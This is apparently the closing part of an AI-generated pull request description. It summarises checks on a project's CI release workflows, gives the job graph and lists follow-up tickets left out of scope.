All four workflows parse as valid YAML; `pin-actions.sh --check` passes; the preflight logic was simulated against the real tree (tag `v1.1.2` matches the parsed manifest version and extracts the CHANGELOG `## [v1.1.2]` section). Job graph: `preflight → {build-dashboard → build, sbom, qnx} → release`.

## Not in scope (tracked follow-ups)

#776 F2/F3 (MSRV CI job + `[workspace.package]` inheritance), F6 (retire ghcr `1.5.*` image tags); #775 F3 (deny graph ros2/tpm features), F4 (scheduled advisories + parko manifest), F6 (per-target / npm / image SBOMs), F7 (exact-tag verify identity + release environment with approvers).

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01MC8UD3ajLiTY7QtnNE7oJ6

---
_Generated by [Claude Code](https://claude.ai/code/session_01MC8UD3ajLiTY7QtnNE7oJ6)_